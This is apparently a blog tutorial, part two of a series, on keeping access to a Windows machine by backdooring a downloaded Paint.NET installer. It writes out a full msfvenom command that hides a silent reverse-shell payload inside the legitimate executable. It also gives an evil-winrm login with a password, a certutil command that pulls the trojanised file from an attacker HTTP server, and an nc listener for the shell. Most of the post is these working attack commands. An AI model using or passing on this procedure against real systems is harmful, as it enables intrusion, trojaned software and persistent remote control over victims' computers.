Persistence on Windows with BackDoors (2/4)
- hamidullahbayram
- 11 May 2023
- 1 dakikada okunur
Güncelleme tarihi: 19 May 2023
2. Using executable files modified by msfvenom

Let’s continue placing payload on target machine. We can modify any mini-tools for Windows such as PuTTy, Winrar, Photo Editors, StickyNotes; which can be downloaded from internet. I will go one of external Paint software.
Here is the download link: https://www.getpaint.net/download.html
It’s downloaded to the attacker’s machine and modified with msfvenom (payload generator) on Kali.
msfvenom -a x64 --platform windows -x paint.net.5.0.3.exe -k -p windows/x64/shell_reverse_tcp lhost=attacker_IP lport=listener_nc -b "\x00" -f exe -o paint.exe
-a for integer capability
-- platform for OS
-x for file to be modified
-k for executing the payload on the background silently
-p for payload
-f for file the type for payload
-o for rename the payload

Now, we can access the target with previously gained credentials to transfer the payload
evil-winrm -i target_IP -u Administrator -p Password321

We can pull the payload to the target machine using certutil, over http-server of attacker.

certutil.exe -urlcache -f http://10.8.55.241:7777/paint.exe paint.exe

Start listener with nc on attacker machine: nc -lvp 4444
then, execute the transferred payload on gained shell: ./paint.exe


Comments